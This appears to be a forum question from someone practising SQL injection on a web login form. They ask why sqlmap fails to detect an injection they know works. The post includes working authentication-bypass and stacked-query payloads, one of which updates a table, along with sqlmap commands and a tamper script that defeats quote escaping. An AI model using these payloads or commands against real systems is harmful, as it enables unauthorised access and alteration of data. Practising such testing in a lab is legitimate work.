How to utilise sqlmap's blind enumeration when you already know the SQL injection query

I am looking for some help on how to get the best out of sqlmap. I am practising on a web application that runs the following query when the login form is submitted:

SELECT * FROM Users WHERE username = ‘*’ AND passhash = ‘5baa61e49cb93f3f0682250b6cf8331b7ee68fd8’;

The web application substitutes all single quotes in the provided username value with backslash + single quote.

Web form injection that works: ' or 1=1; #
Web form injection that works: ' or 1=1; update Products set name=“new-name” where id=346892; #

These are blind injections. The stacked SQL commands can be seen to work by viewing the website text.

Is there a way to let sqlmap know of a working injection and then have it use it’s blind querying skills to enumerate the database?

I have tried and tried to get sqlmap to recognise this injection because I would like to use it’s brilliant abilities to pull data out of the database with it’s time based queries.

Here are a few commands I’ve tried:

$ /home/kali/src/sqlmap-dev/ -u ‘https://hostname/app/doLogin.action’ --data=“username=x&password=x” -p username --prefix=“'” --suffix=“;#” --dbms mysql --level=3 --risk=3 --batch --code=301 -v 6
$ /home/kali/src/sqlmap-dev/ -u ‘https://hostname/app/doLogin.action’ --data=“username=x&password=x” -p username --prefix=“'” --suffix=“;#” --dbms mysql --level=3 --risk=3 --batch --titles --string=‘APPNAME’ -v 6
$ /home/kali/src/sqlmap-dev/ -u ‘https://hostname/app/doLogin.action’ --data=“username=*&password=x” -p username --prefix=“'” --suffix=“;#” --dbms mysql --level=3 --risk=3 --batch --code=301 -v 6

I have put this tamper script in place to put a backslash in front of the first single quote found and change the rest into double quotes. It has the following line of python
return payload.replace(“'”, ‘"’).replace(‘"’,“\'”,1)
Looking at the sqlmap logs I’m happy with the queries being sent to the server and I can see it succeeded with
[13:01:52] [PAYLOAD] x' OR 1=1;#

It seems as though the problem is with sqlmap realising when it has been successful.

If I try that same payload in a web browser it works and logs me in. The developer tools show the first response to the POST is a 301 with a Location: /app, then there’s a 302 GET with Location: /app/, then there’s a 200 GET with the logged in page content.

I’ve tried many variants of --code=301, --code=302, --string, --not-string, --titles and just can’t get it right. I think this is probably the area where I’ve made a mistake. For instance I’ve tried --titles --string=“APPNAME” where the logged in page is the only one that has ‘APPNAME’ as it’s title, the login form page has a title of ‘Log in’ and if there’s an SQL error that page has a title of ‘SQL Exception’